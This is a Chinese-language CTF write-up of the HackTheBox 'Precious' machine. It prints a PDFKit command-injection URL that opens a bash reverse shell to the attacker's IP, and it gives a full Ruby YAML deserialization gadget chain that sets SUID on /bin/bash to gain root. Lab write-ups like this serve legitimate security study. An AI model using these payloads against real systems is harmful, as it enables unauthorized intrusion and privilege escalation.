首页 > 其他分享 >Hackthebox-Precious

Hackthebox-Precious

时间:2022-12-30 18:14:21浏览次数:64  
标签:name local object Hackthebox version file Precious ruby

USER

目标地址10.10.11.189

还是日常简单信息收集的时候开放了22和80,80访问以后发现存在一个域名

http://precious.htb/

绑定hosts,绑定完成后

image-20221229234241241

image-20221229234317309

我的插件告诉我好用了PhusionPassenger,然后就开始尝试网页的功能呢,是一个讲web页面转化成pdf的功能,但是我尝试用它的地址不太行,然后的话我就自己随便起了一个服务,生成了一个pdf

然后用ExifTool分析pdf发现用的工具是PDFkit

image-20221230000412121

然后找到了编号:CVE-20225765

image-20221230001300471

找到一篇文章大概payload应该是
http://example.com/?name=#{' ``'}(放在中间命令就可以执行了,我们反弹shell试试)

http://10.10.16.16/?name=#{'%20`bash -c "sh -i >& /dev/tcp/10.10.16.16/4444 0>&1"`'}

image-20221230001853867

就成功拿到shell了

进来之后一看目录发现一个config的文件,这个文件没有什么用,不能打开后续,在后面的文件里面找到了要的东西,

image-20221230003021741

image-20221230003309306

ROOT

还是把小脚本上传然后执行

然后里面的cve全部尝试都不行,只能老实的看一下自己能执行的指令sudo -l

查看/opt/update_denpendencies.rb 内容

完全没有思路刚刚开始看wp发现我机子上已经有payload了

henry@precious:~$ cat /opt/update_dependencies.rb

# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end


文档说的这里有Yaml.load函数有一个反序列化漏洞没然后看里面那个ymal文件然后再method_id里面使我们要执行的的命令

https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml

 ---
 - !ruby/object:Gem::Installer
     i: x
 - !ruby/object:Gem::SpecFetcher
     i: y
 - !ruby/object:Gem::Requirement
   requirements:
     !ruby/object:Gem::Package::TarReader
     io: &1 !ruby/object:Net::BufferedIO
       io: &1 !ruby/object:Gem::Package::TarReader::Entry
          read: 0
          header: "abc"
       debug_output: &1 !ruby/object:Net::WriteAdapter
          socket: &1 !ruby/object:Gem::RequestSet
              sets: !ruby/object:Net::WriteAdapter
                  socket: !ruby/module 'Kernel'
                  method_id: :system
              git_set: chmod +s /bin/bash
          method_id: :resolve 

然后执行

sudo /usr/bin/ruby /opt/update_dependencies.rb

没咋懂,但是还是抱着今日事今日毕的态度给它做了,然后我直接运行可以运行的指令就拿到root了

然后执行 whoami 可以看到自己就是root用户了

标签:name,local,object,Hackthebox,version,file,Precious,ruby
From: https://www.cnblogs.com/0x3e-time/p/17015514.html

相关文章

  • hackthebox-Soccer
    靶机地址10.10.11.194user权限发现存在80端口嘛然后访问一下然后发现转到域名为本地绑定一下IP和域名这里因为是htb的靶场就不扫子域名了直接爆目录扫到一个目......
  • HACKTHEBOX VM LIST
    LinuxBoxes:WindowsBoxes:MorechallengingthanOSCP,butgoodpractice:LamelegacyJeeves[Windows]brainfuckBlueBart[Windows]shockerDevel......